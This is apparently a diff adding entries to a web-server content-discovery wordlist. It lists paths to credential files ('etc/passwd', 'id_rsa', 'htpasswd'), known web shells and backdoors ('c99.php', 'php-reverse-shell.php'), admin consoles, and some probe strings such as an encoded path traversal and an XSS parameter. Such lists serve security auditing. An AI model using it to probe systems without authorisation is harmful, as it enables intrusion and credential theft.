+editor-4.8.0-en.php
+editor-4.8.0-mysql-en.php
+editor-4.8.0.php
+editor-4.8.1-en.php
+editor-4.8.1-mysql-en.php
+editor-4.8.1.php
+editor.php
+editor/
+editor/FCKeditor
+editor/stats/
+editor/tiny_mce/
+editor/tinymce/
+editors/
+editors/FCKeditor
+EemAdminService/EemAdmin?wsdl
+eggs/
+ehthumbs.db
+elastic/
+elasticsearch/
+elfinder/
+elfinder/elfinder.php
+elm-stuff
+elmah.axd
+email/
+encode-explorer.php
+encode-explorer_5.0/
+encode-explorer_5.1/
+encode-explorer_6.0/
+encode-explorer_6.1/
+encode-explorer_6.2/
+encode-explorer_6.3/
+encode-explorer_6.4.1/
+encode-explorer_6.4/
+encode_explorer-3.2/
+encode_explorer-3.3/
+encode_explorer-3.4/
+encode_explorer-4.0/
+encode_explorer.php
+encode_explorer/
+encode_explorer_32/
+engine.tar.gz
+engine.zip
+engine/
+engine/classes/swfupload/swfupload.swf
+engine/classes/swfupload/swfupload_f9.swf
+engine/log.txt
+env
+env.bak/
+env.js
+env.json
+env.list
+ENV/
+env/
+environment.rb
+erl_crash.dump
+err
+err.log
+err.txt
+error
+error-log
+error-log.txt
+error.asp
+error.cpp
+error.ctp
+error.html
+error.ini
+error.log
+error.log.0
+error.tmpl
+error.tpl
+error.txt
+error.xml
+error/
+error_import
+error_log
+error_log.gz
+error_log.txt
+errorlog
+errorPages
+errors.asp
+errors.log
+errors.tpl
+errors.txt
+errors/
+errors/creation
+errors/local.xml
+etc
+etc/
+etc/config.ini
+etc/database.xml
+etc/hosts
+etc/lib/pChart2/examples/imageMap/index.php
+etc/passwd
+etcd-apiserver-client.key
+etcd-ca.crt
+etcd-events.log
+etcd.log
+eudora.ini
+eula.txt
+eula_en.txt
+ews/
+example.php
+examples
+examples/
+examples/jsp/%252e%252e/%252e%252e/manager/html/
+examples/jsp/snp/snoop.jsp
+examples/servlet/SnoopServlet
+examples/servlets/servlet/CookieExample
+examples/servlets/servlet/RequestHeaderExample
+exception.log
+exchange/
+exchweb/
+exec
+expires.conf
+exploded-archives/
+explore
+explore/repos
+explorer
+export
+export.cfg
+export/
+export_presets.cfg
+ExportedObj/
+exports.zip
+ext/
+ext/.deps
+ext/build/
+ext/config
+ext/install-sh
+ext/libtool
+ext/ltmain.sh
+ext/Makefile
+ext/missing
+ext/mkinstalldirs
+ext/modules/
+ext/run-tests.php
+extjs/
+extjs/resources//charts.swf
+extras/documentation
+ezsqliteadmin/
+fabric/
+fake-eggs/
+FakesAssemblies/
+FAQ
+fastlane/Preview.html
+fastlane/readme.md
+fastlane/report.xml
+fastlane/screenshots
+fastlane/test_output
+fcgi-bin/echo
+fcgi-bin/echo.exe
+fcgi-bin/echo2
+fcgi-bin/echo2.exe
+fckeditor
+FCKeditor
+fckeditor/
+FCKeditor/
+fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+fckeditor/editor/filemanager/connectors/asp/connector.asp
+fckeditor/editor/filemanager/connectors/asp/upload.asp
+fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+fckeditor/editor/filemanager/connectors/php/connector.php
+fckeditor/editor/filemanager/connectors/php/upload.php
+fckeditor/editor/filemanager/upload/asp/upload.asp
+fckeditor/editor/filemanager/upload/aspx/upload.aspx
+fckeditor/editor/filemanager/upload/php/upload.php
+FCKeditor2.0/
+FCKeditor2.1/
+FCKeditor2.2/
+FCKeditor2.3/
+FCKeditor2.4/
+FCKeditor2/
+FCKeditor20/
+FCKeditor21/
+FCKeditor22/
+FCKeditor23/
+FCKeditor24/
+features
+features.json
+feixiang.php
+file.php
+file_manager/
+file_upload.asp
+file_upload.aspx
+file_upload.cfm
+file_upload.htm
+file_upload.html
+file_upload.php
+file_upload.php3
+file_upload.shtm
+file_upload/
+fileadmin
+fileadmin.php
+fileadmin/
+fileadmin/_processed_/
+fileadmin/_temp_/
+fileadmin/user_upload/
+filedump/
+filemanager
+filemanager/
+filemanager/views/js/ZeroClipboard.swf
+filerun.php
+filerun/
+files.7z
+files.md5
+files.php
+files.rar
+files.tar
+files.tar.bz2
+files.tar.gz
+files.zip
+files/
+Files/binder.autosave
+Files/binder.backup
+files/cache/
+Files/Docs/docs.checksum
+Files/search.indexes
+files/tmp/
+Files/user.lock
+fileupload/
+FileZilla.xml
+filezilla.xml
+findbugs/
+firebase-debug.log
+flash/
+flash/ZeroClipboard.swf
+flashFXP.ini
+fluent.conf
+fluent_aggregator.conf
+flyway
+fmr.php
+formslogin/
+forum.rar
+forum.sql
+forum.tar
+forum.tar.bz2
+forum.tar.gz
+forum.zip
+forum/
+forum/install/install.php
+forums/
+forums/cache/db_update.lock
+fpadmin
+fpadmin/
+fpm-ping
+fpm-status
+framework.zip
+framework/yiic.php
+freeline.py
+freeline/
+freeline_project_description.json
+ftp.txt
+fuel/app/cache/
+fuel/app/config/
+fuel/app/logs/
+function.require
+functions/
+ganglia/
+gateway/
+gaza.php
+gbpass.pl
+Gemfile
+Gemfile.lock
+GEMINI/
+gen/
+Generated_Code/
+get.php
+getFile.cfm
+git-service
+git/
+github-cache
+github-recovery-codes.txt
+github/
+gitlab/
+gitlog
+gl/
+global
+global.asa
+global.asa.bak
+global.asa.old
+global.asa.orig
+global.asa.temp
+global.asa.tmp
+global.asax
+global.asax.bak
+global.asax.old
+global.asax.orig
+global.asax.temp
+global.asax.tmp
+globals
+globals.inc
+globals.jsa
+globes_admin/
+glpi/
+google-services.json
+grabbed.html
+gradle-app.setting
+gradle/
+grafana/
+graphiql
+graphiql.php
+graphiql/
+graphite/
+graphql
+graphql.js
+graphql.php
+graphql/
+graphql/console/
+grappelli/
+graylog/
+groovy/
+groupexpansion/
+Gruntfile.coffee
+gruntfile.coffee
+GruntFile.coffee
+gruntfile.js
+Gruntfile.js
+gruntFile.js
+guanli
+guanli/
+guanli/admin.asp
+Guardfile
+gulp-azure-sync-assets.js
+Gulpfile
+gulpfile.coffee
+Gulpfile.coffee
+gulpfile.js
+Gulpfile.js
+gwt-unitCache/
+h2console
+hac/
+happyaxis.jsp
+haproxy/
+health
+health.json
+healthcheck.php
+heapdump
+heapdump.json
+HISTORY
+HISTORY.txt
+hmc/
+HNAP1/
+hndUnblock.cgi
+home.html
+home.php
+home.rar
+home.tar
+home.tar.bz2
+home.tar.gz
+home.zip
+Homestead.json
+Homestead.yaml
+host-manager/
+host-manager/html
+hosts
+houtai
+houtai/
+houtai/admin.asp
+hpwebjetadmin/
+hs_err_pid.log
+htaccess.backup
+htaccess.bak
+htaccess.dist
+htaccess.old
+htaccess.txt
+htdocs
+htdocs.zip
+htgroup
+html.tar
+html.tar.bz2
+html.tar.gz
+html.zip
+html/
+html/config.rb
+html/js/misc/swfupload/swfupload.swf
+html/js/misc/swfupload/swfupload_f9.swf
+htmlcov/
+htpasswd
+htpasswd.bak
+htpasswd/
+htpasswd/htpasswd.bak
+Http/
+Http/DataLayCfg.xml
+http_access.log
+httpd.conf
+httpd.conf.backup
+httpd.conf.default
+httpd.core
+httpd.ini
+httpd/
+httpd/logs/access.log
+httpd/logs/access_log
+httpd/logs/error.log
+httpd/logs/error_log
+httptrace
+hudson/
+hudson/login
+hybridconfig/
+hystrix
+i.php
+icinga/
+id_dsa
+id_dsa.ppk
+id_rsa
+id_rsa.pub
+iiasdmpwd/
+iisadmin/
+images/
+images/c99.php
+images/Sym.php
+import.php
+import/
+import_error.log
+importcockpit/
+in/
+inc/
+inc/config.inc
+inc/fckeditor/
+inc/tiny_mce/
+inc/tinymce/
+include
+include/
+include/fckeditor/
+includes
+includes/
+includes/adovbs.inc
+includes/bootstrap.inc
+includes/configure.php~
+includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+includes/fckeditor/editor/filemanager/connectors/asp/connector.asp
+includes/fckeditor/editor/filemanager/connectors/asp/upload.asp
+includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+includes/fckeditor/editor/filemanager/connectors/php/connector.php
+includes/fckeditor/editor/filemanager/connectors/php/upload.php
+includes/fckeditor/editor/filemanager/upload/asp/upload.asp
+includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+includes/fckeditor/editor/filemanager/upload/php/upload.php
+includes/js/tiny_mce/
+includes/swfupload/swfupload.swf
+includes/swfupload/swfupload_f9.swf
+includes/tiny_mce/
+includes/tinymce/
+index-bak
+index-test.php
+index.htm
+index.html
+index.php
+index.php-bak
+index.php.bak
+index.php3
+index.php4
+index.php5
+index.php~
+index.tar
+index.tar.bz2
+index.tar.gz
+index.xml
+index.zip
+index2.php
+index3.php
+index_manage
+Indy_admin/
+influxdb/
+info
+info.json
+info.php
+info.txt
+infos.php
+ingress.yaml
+init/
+inspector
+instadmin/
+Install
+install
+INSTALL
+install-log.txt
+install-sh
+install.asp
+install.aspx
+install.bak
+install.config
+install.htm
+INSTALL.HTML
+INSTALL.html
+Install.html
+install.html
+install.inc
+INSTALL.MD
+install.md
+Install.md
+INSTALL.md
+INSTALL.mysql
+install.mysql
+install.mysql.txt
+INSTALL.mysql.txt
+install.pgsql
+INSTALL.pgsql
+INSTALL.pgsql.txt
+install.pgsql.txt
+install.php
+install.rdf
+install.sql
+install.tpl
+install.txt
+Install.txt
+INSTALL.txt
+INSTALL.TXT
+install.zip
+install/
+install/index.php?upgrade/
+install/update.log
+install_
+INSTALL_admin
+install_manifest.txt
+install_mgr.log
+installation.php
+installation/
+installed.json
+InstalledFiles
+installer
+installer-backup.php
+installer-data.sql
+installer-log.txt
+installer.php
+installer_files/
+install~/
+instance/
+integrationgraph
+Intermediate/
+internal/docs
+invoker/
+invoker/JMXInvokerServlet
+invoker/readonly/JMXInvokerServlet
+invoker/restricted/JMXInvokerServlet
+io.swf
+iOSInjectionProject/
+ipch/
+irc-macadmin/
+irequest/
+isadmin
+isadmin.php
+ispmgr/
+iwa/authenticated.aspx
+iwa/iwa_test.aspx
+j2ee/servlet/SnoopServlet
+jacoco/
+Jakefile
+javascripts/bundles
+javax.faces.resource.../
+javax.faces.resource.../WEB-INF/web.xml.jsf
+jboss-net/
+jboss-net//happyaxis.jsp
+jboss-net/happyaxis.jsp
+jboss/server/all/deploy/project.ext
+jboss/server/all/log/
+jboss/server/default/deploy/project.ext
+jboss/server/default/log/
+jboss/server/minimal/deploy/project.ext
+jbossws/services
+jbpm-console/app/tasks.jsf
+jdbc
+jdkstatus
+jenkins/
+Jenkinsfile
+jira/
+jk-status
+jk/
+jkmanager
+jkmanager-auth
+jkstatus
+jkstatus-auth
+jmx-console
+jmx-console/
+jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
+jo.php
+jolokia
+jolokia/
+jolokia/list
+joomla.rar
+joomla.xml
+joomla.zip
+joomla/
+joomla/administrator
+js/
+js/elfinder/elfinder.php
+js/envConfig.js
+js/FCKeditor
+js/prepod.js
+js/prod.js
+js/qa.js
+js/routing
+js/swfupload/swfupload.swf
+js/swfupload/swfupload_f9.swf
+js/tiny_mce/
+js/tinymce/
+js/yui/uploader/assets/uploader.swf
+js/ZeroClipboard.swf
+js/ZeroClipboard10.swf
+jscripts/
+jscripts/tiny_mce/
+jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
+jscripts/tinymce/
+jsp-examples/
+jsp-reverse.jsp
+jsp/viewer/snoop.jsp
+jspm_packages/
+jssresource/
+juju/
+junit/
+kafka/
+kairosdb/
+karma.conf.js
+kcfinder/
+kcfinder/browse.php
+key.pem
+keys.json
+kibana/
+killer.php
+known_tokens.csv
+kpanel/
+krb.log
+krblog.txt
+kube-apiserver.log
+kube-controller-manager.log
+kube-proxy.log
+kube-scheduler.log
+kube/
+kuber/
+kubernetes/
+l0gs.txt
+L3b.php
+lander.logs
+latest/meta-data/hostname
+latest/user-data
+layouts/
+ldap.prop
+ldap.prop.sample
+ldap/
+letmein
+letmein.php
+letmein/
+level
+lfm.php
+lg/
+lg/lg.conf
+lia.cache
+lib-cov
+lib/
+lib/bundler/man/
+lib/fckeditor/
+lib/flex/uploader/.actionScriptProperties
+lib/flex/uploader/.flexProperties
+lib/flex/uploader/.project
+lib/flex/uploader/.settings
+lib/flex/varien/.actionScriptProperties
+lib/flex/varien/.flexLibProperties
+lib/flex/varien/.project
+lib/flex/varien/.settings
+lib/tiny_mce/
+lib/tinymce/
+lib64/
+libraries/
+libraries/phpmailer/
+libraries/tiny_mce/
+libraries/tinymce/
+librepag.log
+LICENSE
+license
+license.md
+LICENSE.md
+license.php
+license.txt
+LICENSE.txt
+license_key.php
+liferay.log
+liferay/
+lighttpd.access.log
+lighttpd.error.log
+lilo.conf
+lindex.php
+linkhub/
+linkhub/linkhub.log
+linktous.html
+linusadmin-phpinfo.php
+liquibase
+list_emails
+listener.log
+lists/
+lists/config
+LiveUser_Admin/
+lk/
+load.php
+local.config.rb
+local.properties
+local.xml.additional
+local.xml.template
+local/
+local/composer.lock
+local/composer.phar
+local_bd_new.txt
+local_bd_old.txt
+local_conf.php.bac
+local_conf.php.bak
+local_settings.py
+localhost.sql
+localsettings.php.bak
+localsettings.php.dist
+localsettings.php.old
+localsettings.php.save
+localsettings.php.swp
+localsettings.php.txt
+localsettings.php~
+log
+log-in
+log-in.php
+log-in/
+log.htm
+log.html
+log.json
+log.mdb
+log.php
+log.sqlite
+log.txt
+log/
+log/access.log
+log/access_log
+log/authorizenet.log
+log/development.log
+log/error.log
+log/error_log
+log/exception.log
+log/librepag.log
+log/log.log
+log/log.txt
+log/old
+log/payment.log
+log/payment_authorizenet.log
+log/payment_paypal_express.log
+log/production.log
+log/server.log
+log/test.log
+log/www-error.log
+log_1.txt
+log_errors.txt
+log_in
+log_in.php
+log_in/
+logexpcus.txt
+logfile
+logfile.txt
+logfiles
+loggers
+loggers.json
+loggers/
+logi.php
+login
+login-gulp.js
+login-redirect/
+login-us/
+login.asp
+login.cgi
+login.htm
+login.html
+login.json
+login.php
+login/
+login/admin/admin.asp
+login/index
+login/login
+login/super
+login1
+login1/
+login_admi
+login_admin
+login_admin/
+login_db/
+login_ou.php
+login_out
+login_out/
+login_use.php
+login_user
+loginerror/
+loginflat/
+loginok/
+logins.txt
+loginsave/
+loginsupe.php
+loginsuper
+loginsuper/
+logo_sysadmin/
+logou.php
+logout
+logout.asp
+logout/
+logs
+logs.htm
+logs.html
+logs.mdb
+logs.pl
+logs.sqlite
+logs.txt
+Logs/
+logs/
+logs/access.log
+logs/access_log
+logs/error.log
+logs/error_log
+logs/liferay.log
+logs/mail.log
+logs/proxy_access_ssl_log
+logs/proxy_error_log
+logs/wsadmin.traceout
+logs/www-error.log
+logs_backup/
+logs_console/
+logstash/
+lol.php
+Lotus_Domino_Admin/
+ltmain.sh
+luac.out
+m4/libtool.m4
+m4/ltoptions.m4
+m4/ltsugar.m4
+m4/ltversion.m4
+m4/lt~obsolete.m4
+macadmin/
+madspot.php
+madspotshell.php
+magic.default
+magmi/
+magmi/conf/magmi.ini
+mail
+mail.log
+mail/
+Mail/smtp/Admin/smadv.asp
+mailer/.env
+mailman/
+mailman/listinfo
+main.env
+main.mdb
+main.zip
+main/
+main/login
+maint/
+MAINTAINERS.txt
+maintenance.flag
+maintenance.flag.bak
+maintenance.flag2
+maintenance.html
+maintenance.php
+maintenance/
+maintenance/test.php
+maintenance/test2.php
+Makefile
+Makefile.in
+Makefile.old
+manage
+manage.php
+manage.py
+manage/
+manage/admin.asp
+manage/login.asp
+manage_index
+management
+management.php
+management/
+management/configprops
+management/env
+manager
+manager.php
+manager/
+manager/admin.asp
+manager/html
+manager/login
+manager/login.asp
+manager/status/all
+MANIFEST
+MANIFEST.bak
+manifest.mf
+MANIFEST.MF
+manifest.yml
+manifest/cache/
+manifest/logs/
+manifest/tmp/
+manuallogin/
+mappings
+mappings.json
+master.passwd
+master.tar
+master.tar.bz2
+master.tar.gz
+master.zip
+master/
+master/portquotes_new/admin.log
+mattermost/
+maven/
+mbox
+mcollective/
+mcx/
+mcx/mcxservice.svc
+mdate-sh
+media.tar
+media.tar.bz2
+media.tar.gz
+media.zip
+media/
+media/export-criteo.xml
+meet/
+meeting/
+member
+member.php
+member/
+member/admin.asp
+member/login.asp
+memberadmin
+memberadmin.php
+memberadmin/
+memberlist
+members
+members.csv
+members.log
+members.mdb
+members.php
+members.sql
+members.sql.gz
+members.sqlite
+members.txt
+members.xls
+members/
+membersonly
+memcached/
+memlogin/
+mercurial.ini
+mercurial/
+Mercury.modules
+Mercury/
+mesos/
+META-INF/
+META-INF/context.xml
+META.json
+META.yml
+meta_login/
+metadata.rb
+metric/
+metric_tracking
+metric_tracking.json
+metrics
+metrics.json
+metrics/
+microsoft-server-activesync/
+mics/
+mics/mics.html
+mifs/
+mifs/user/index.html
+migration.log
+mimosa-config.coffee
+mimosa-config.js
+mirror.cfg
+mirror/
+misc
+missing
+mkdocs.yml
+Mkfile.old
+moadmin.php
+moadmin/
+mock/
+modelsearch/
+modelsearch/admin.html
+modelsearch/admin.php
+modelsearch/index.html
+modelsearch/index.php
+modelsearch/login
+modelsearch/login.html
+modelsearch/login.php
+moderator
+moderator.html
+moderator.php
+moderator/
+moderator/admin
+moderator/admin.html
+moderator/admin.php
+moderator/login
+moderator/login.html
+moderator/login.php
+modern.json
+modern.jsonp
+Module.symvers
+module.zip
+modules.order
+modules/
+modules/admin/
+mongo/
+mongodb/
+monit/
+monitor
+monitor/
+monitoring
+monitoring/
+moving.page
+mrtg.cfg
+msg/
+msg_gen/
+msmtp_default.log
+msql/
+mssql/
+mt-check.cgi
+munin/
+muracms.esproj
+mw-config/
+mx.php
+my.7z
+my.rar
+my.tar
+my.tar.bz2
+my.tar.gz
+my.zip
+myadm/
+MyAdmin/
+myadmin/
+myadmin/index.php
+MyAdmin/scripts/setup.php
+myadmin/scripts/setup.php
+myadmin2/index.php
+myadminscripts/
+myadminscripts/setup.php
+myconf.env
+myserver.key
+mysql-admin/
+mysql-admin/index.php
+mysql.err
+mysql.log
+mysql.php
+mysql.sql
+mysql.tar
+mysql.tar.bz2
+mysql.tar.gz
+mysql.zip
+mysql/
+mysql/admin/
+mysql/db/
+mysql/dbadmin/
+mysql/index.php
+mysql/mysqlmanager/
+mysql/pma/
+mysql/pMA/
+mysql/scripts/setup.php
+mysql/sqlmanager/
+mysql/web/
+mysql_debug.sql
+mysqladmin/
+mysqladmin/index.php
+mysqladmin/scripts/setup.php
+mysqldump.sql
+mysqldumper/
+mysqlitedb.db
+mysqlmanager/
+naginator/
+nagios/
+nano.save
+native_stderr.log
+native_stdout.log
+navSiteAdmin/
+nb-configuration.xml
+nbactions.xml
+nbproject/
+nbproject/private/private.properties
+nbproject/private/private.xml
+nbproject/project.properties
+nbproject/project.xml
+netdata/
+New%20Folder
+New%20folder%20(2)
+new.7z
+new.php
+new.rar
+new.tar
+new.tar.bz2
+new.tar.gz
+new.zip
+newbbs/
+newbbs/login
+newsadmin/
+nextcloud/
+nfs/
+ng-cli-backup.json
+nginx-access.log
+nginx-error.log
+nginx-ssl.access.log
+nginx-ssl.error.log
+nginx-status/
+nginx.conf
+nginx_status
+nginx_template.conf
+ngx_pagespeed_beacon/
+nia.cache
+nimcache/
+nlia.cache
+node-role.kubernetes.io
+node_modules
+node_modules/
+nohup.out
+nosetests.xml
+npm-debug.log
+npm-shrinkwrap.json
+nra.cache
+nst.php
+nstview.php
+nsw/
+nsw/admin/login.php
+nwp-content/
+nwp-content/plugins/disqus-comment-system/disqus.php
+nytprof.out
+oab/
+obj/
+ocp.php
+ocsp/
+odbc
+Office/
+Office/graph.php
+olap/
+old
+old.7z
+old.htaccess
+old.htpasswd
+old.rar
+old.tar
+old.tar.bz2
+old.tar.gz
+old.zip
+old/
+old_files
+old_site/
+oldfiles
+ona
+opa-debug-js
+open-flash-chart.swf?get-data=xss
+OpenCover/
+openshift/
+openstack/
+opentsdb/
+openvpn.ovpn
+openvpnadmin/
+operador/
+operator/
+oprocmgr-service
+oprocmgr-status
+ops/
+oracle
+order.log
+order.txt
+order_add_log.txt
+order_log
+orders
+orders.csv
+orders.log
+orders.sql
+orders.sql.gz
+orders.txt
+orders.xls
+orders_log
+orleans.codegen.cs
+ospfd.conf
+osticket/
+otrs/
+out.txt
+out/
+output
+output-build.txt
+output/
+owa/
+OWA/
+owncloud/
+p.php
+p/
+p/m/a/
+package-cache
+package-lock.json
+package.json
+Package.StoreAssociation.xml
+package/
+packer_cache/
+pagerduty/
+pages/
+pages/admin/
+pages/admin/admin-login
+pages/admin/admin-login.html
+pages/admin/admin-login.php
+painel/
+painel/config/config.php.example
+paket-files/
+panel
+panel-administracion/
+panel-administracion/admin.html
+panel-administracion/admin.php
+panel-administracion/index.html
+panel-administracion/index.php
+panel-administracion/login
+panel-administracion/login.html
+panel-administracion/login.php
+panel.php
+panel/
+params.txt
+parts/
+pass
+pass.dat
+pass.txt
+passes.txt
+passlist
+passlist.txt
+passwd
+passwd.adjunct
+passwd.bak
+passwd.txt
+Password
+password
+password.html
+password.log
+password.mdb
+password.sqlite
+password.txt
+passwords
+passwords.html
+passwords.mdb
+passwords.sqlite
+passwords.txt
+path/
+path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+pause
+pause.json
+payment.log
+payment_authorizenet.log
+payment_paypal_express.log
+pbmadmin/
+pbx/
+pentaho/
+perl-reverse-shell.pl
+perlcmd.cgi
+persistentchat/
+personal
+personal.mdb
+personal.sqlite
+pg_hba.conf
+pgadmin
+pgadmin.log
+pgadmin/
+PharoDebug.log
+phinx.yml
+phoenix
+phoneconferencing/
+php
+php-backdoor.php
+php-cgi.core
+php-cli.ini
+php-cs-fixer.phar
+php-error.log
+php-error.txt
+php-errors.log
+php-errors.txt
+php-findsock-shell.php
+php-fpm/
+php-fpm/error.log
+php-fpm/www-error.log
+php-info.php
+php-my-admin/
+php-myadmin/
+php-reverse-shell.php
+php-tiny-shell.php
+php.core
+php.error.log
+php.ini
+php.ini-orig.txt
+php.ini.sample
+php.ini_
+php.ini~
+php.lnk
+php.log
+php.php
+php/
+php/dev/
+php/php.cgi
+php4.ini
+php5.fcgi
+php5.ini
+php_cli_errors.log
+php_error.log
+php_error_log
+php_errorlog
+php_errors.log
+phpadmin/
+phpadmin/index.php
+phpadminmy/
+phperrors.log
+phpFileManager.php
+phpFileManager/
+phpfm-1.6.1/
+phpfm-1.7.1/
+phpfm-1.7.2/
+phpfm-1.7.3/
+phpfm-1.7.4/
+phpfm-1.7.5/
+phpfm-1.7.6/
+phpfm-1.7.7/
+phpfm-1.7.8/
+phpfm-1.7/
+phpfm.php
+phpfm/
+phpinfo
+phpinfo.php
+phpinfo.php3
+phpinfo.php4
+phpinfo.php5
+phpinfos.php
+phpini.bak
+phpldapadmin
+phpldapadmin/
+phpliteadmin%202.php
+phpliteadmin.php
+phpLiteAdmin/
+phpLiteAdmin_/
+phpm/
+phpma/
+phpma/index.php
+phpmailer
+phpmanager/
+phpmem/
+phpmemcachedadmin/
+phpminiadmin.php
+phpminiadmin/
+phpmoadmin/
+phpMoAdmin/
+phpmy-admin/
+phpmy/
+phpMy/
+phpMyA/
+phpmyad-sys/
+phpmyad/
+phpMyAdmi/
+phpMyAdmin-2.10.0/
+phpMyAdmin-2.10.1/
+phpMyAdmin-2.10.2/
+phpMyAdmin-2.10.3/
+phpMyAdmin-2.11.0/
+phpMyAdmin-2.11.1/
+phpMyAdmin-2.11.10/
+phpMyAdmin-2.11.2/
+phpMyAdmin-2.11.3/
+phpMyAdmin-2.11.4/
+phpMyAdmin-2.11.5.1-all-languages/
+phpMyAdmin-2.11.5/
+phpMyAdmin-2.11.6-all-languages/
+phpMyAdmin-2.11.6/
+phpMyAdmin-2.11.7.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.7.1-all-languages/
+phpMyAdmin-2.11.7/
+phpMyAdmin-2.11.8.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.8.1-all-languages/
+phpMyAdmin-2.11.8.1/
+phpMyAdmin-2.11.9/
+phpMyAdmin-2.2.3/
+phpMyAdmin-2.2.6/
+phpMyAdmin-2.5.1/
+phpMyAdmin-2.5.4/
+phpMyAdmin-2.5.5-pl1/
+phpMyAdmin-2.5.5-rc1/
+phpMyAdmin-2.5.5-rc2/
+phpMyAdmin-2.5.5/
+phpMyAdmin-2.5.6-rc1/
+phpMyAdmin-2.5.6-rc2/
+phpMyAdmin-2.5.6/
+phpMyAdmin-2.5.7-pl1/
+phpMyAdmin-2.5.7/
+phpMyAdmin-2.6.0-alpha/
+phpMyAdmin-2.6.0-alpha2/
+phpMyAdmin-2.6.0-beta1/
+phpMyAdmin-2.6.0-beta2/
+phpMyAdmin-2.6.0-pl1/
+phpMyAdmin-2.6.0-pl2/
+phpMyAdmin-2.6.0-pl3/
+phpMyAdmin-2.6.0-rc1/
+phpMyAdmin-2.6.0-rc2/
+phpMyAdmin-2.6.0-rc3/
+phpMyAdmin-2.6.0/
+phpMyAdmin-2.6.1-pl1/
+phpMyAdmin-2.6.1-pl2/
+phpMyAdmin-2.6.1-pl3/
+phpMyAdmin-2.6.1-rc1/
+phpMyAdmin-2.6.1-rc2/
+phpMyAdmin-2.6.1/
+phpMyAdmin-2.6.2-beta1/
+phpMyAdmin-2.6.2-pl1/
+phpMyAdmin-2.6.2-rc1/
+phpMyAdmin-2.6.2/
+phpMyAdmin-2.6.3-pl1/
+phpMyAdmin-2.6.3-rc1/
+phpMyAdmin-2.6.3/
+phpMyAdmin-2.6.4-pl1/
+phpMyAdmin-2.6.4-pl2/
+phpMyAdmin-2.6.4-pl3/
+phpMyAdmin-2.6.4-pl4/
+phpMyAdmin-2.6.4-rc1/
+phpMyAdmin-2.6.4/
+phpMyAdmin-2.7.0-beta1/
+phpMyAdmin-2.7.0-pl1/
+phpMyAdmin-2.7.0-pl2/
+phpMyAdmin-2.7.0-rc1/
+phpMyAdmin-2.7.0/
+phpMyAdmin-2.8.0-beta1/
+phpMyAdmin-2.8.0-rc1/
+phpMyAdmin-2.8.0-rc2/
+phpMyAdmin-2.8.0.1/
+phpMyAdmin-2.8.0.2/
+phpMyAdmin-2.8.0.3/
+phpMyAdmin-2.8.0.4/
+phpMyAdmin-2.8.0/
+phpMyAdmin-2.8.1-rc1/
+phpMyAdmin-2.8.1/
+phpMyAdmin-2.8.2/
+phpMyAdmin-2/
+phpMyAdmin-3.0.0/
+phpMyAdmin-3.0.1/
+phpMyAdmin-3.1.0/
+phpMyAdmin-3.1.1/
+phpMyAdmin-3.1.2/
+phpMyAdmin-3.1.3/
+phpMyAdmin-3.1.4/
+phpMyAdmin-3.1.5/
+phpMyAdmin-3.2.0/
+phpMyAdmin-3.2.1/
+phpMyAdmin-3.2.2/
+phpMyAdmin-3.2.3/
+phpMyAdmin-3.2.4/
+phpMyAdmin-3.2.5/
+phpMyAdmin-3.3.0/
+phpMyAdmin-3.3.1/
+phpMyAdmin-3.3.2-rc1/
+phpMyAdmin-3.3.2/
+phpMyAdmin-3.3.3-rc1/
+phpMyAdmin-3.3.3/
+phpMyAdmin-3.3.4-rc1/
+phpMyAdmin-3.3.4/
+phpMyAdmin-3/
+phpMyAdmin-4/
+phpmyadmin-old/index.php
+phpMyAdmin.old/index.php
+phpmyadmin/
+phpMyAdmin/
+phpMyadmin/
+phpmyAdmin/
+phpMyAdmin/index.php
+phpmyadmin/index.php
+phpmyadmin/phpmyadmin/index.php
+phpMyAdmin/phpMyAdmin/index.php
+phpMyAdmin/scripts/setup.php
+phpmyadmin/scripts/setup.php
+phpmyadmin0/
+phpMyAdmin0/
+phpmyadmin0/index.php
+phpMyAdmin1/
+phpmyadmin1/
+phpmyadmin1/index.php
+phpmyadmin2/
+phpMyAdmin2/
+phpmyadmin2/index.php
+phpmyadmin2011/
+phpmyadmin2012/
+phpmyadmin2013/
+phpmyadmin2014/
+phpmyadmin2015/
+phpmyadmin2016/
+phpmyadmin2017/
+phpmyadmin2018/
+phpmyadmin3/
+phpMyAdmin3/
+phpmyadmin4/
+phpMyAdmin4/
+phpMyadmin_bak/index.php
+phpMyAdminBackup/
+phpMyAdminold/index.php
+phpMyAds/
+phppgadmin
+phpPgAdmin/
+phppgadmin/
+phppma/
+phpRedisAdmin/
+phpredmin/
+phproad/
+phpsecinfo/
+phpspec.yml
+phpSQLiteAdmin/
+phpstudy.php
+phpsysinfo/
+phptest.php
+phpThumb.php
+phpThumb/
+phpunit.phar
+phpunit.xml
+phpunit.xml.dist
+phymyadmin/
+pi.php
+pi.php5
+pids
+pinfo.php
+pip-delete-this-directory.txt
+pip-log.txt
+piwigo/
+piwigo/extensions/UserCollections/template/ZeroClipboard.swf
+pkg/
+placeholder_one
+placeholder_two
+planning/cfg
+planning/docs
+planning/src
+platz_login/
+play-cache
+play-stash
+player.swf
+playground
+playground.xcworkspace
+plugin.xml
+plugins
+plugins.log
+plugins/
+plugins/editors/fckeditor
+plugins/fckeditor
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
+plugins/tiny_mce/
+plugins/tinymce/
+plugins/upload.php
+plugins/web.config
+plupload
+pm_to_blib
+pma-old/index.php
+PMA/
+pma/
+pma/index.php
+PMA/index.php
+pma/scripts/setup.php
+PMA2/index.php
+pma2005/
+PMA2005/
+pma2009/
+PMA2009/
+PMA2011/
+pma2011/
